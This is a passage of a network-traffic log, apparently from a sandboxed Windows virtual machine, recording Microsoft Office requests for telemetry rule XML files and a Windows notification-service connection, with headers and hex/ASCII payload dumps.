                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                122192.168.2.65852913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:09 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1358
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                x-ms-request-id: 84e7aa3f-c01e-008e-74ff-167381000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144209Z-1657d5bbd48xsz2nuzq4vfrzg8000000023000000000043t
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                123192.168.2.65853113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:09 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1358
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                x-ms-request-id: 76165599-601e-000d-1a02-172618000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144209Z-1657d5bbd48sqtlf1huhzuwq7000000001y0000000002c5g
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                124192.168.2.65853213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:09 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1389
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                x-ms-request-id: 29f28342-e01e-003c-5d00-17c70b000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144209Z-1657d5bbd48xlwdx82gahegw40000000028g00000000ft75
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                125192.168.2.65853413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:10 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1405
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                                x-ms-request-id: 6f1c5b1d-901e-0048-485a-17b800000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144210Z-1657d5bbd48sdh4cyzadbb3748000000020g000000005nw4
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                126192.168.2.65853313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:10 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1352
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                x-ms-request-id: a9a45936-c01e-00a1-54f1-167e4a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144210Z-1657d5bbd487nf59mzf5b3gk8n00000001r000000000deqe
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                127192.168.2.65853513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:10 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1401
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                                x-ms-request-id: 3a04fc40-501e-007b-3b73-175ba2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144210Z-1657d5bbd48gqrfwecymhhbfm800000000xg00000000can0
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                128192.168.2.65853613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:10 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1368
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                                x-ms-request-id: 173e0f62-801e-00a3-24fe-167cfb000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144210Z-1657d5bbd48vhs7r2p1ky7cs5w00000002h0000000000z8e
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                129192.168.2.65853740.113.103.199443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 59 4d 38 68 32 62 4e 65 52 6b 61 38 49 78 64 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 33 35 61 63 66 34 37 32 35 66 63 63 64 39 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 304MS-CV: YM8h2bNeRka8Ixd3.1Context: 835acf4725fccd9
                                                                                                                                                                                                                                                                                2024-10-06 14:42:10 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
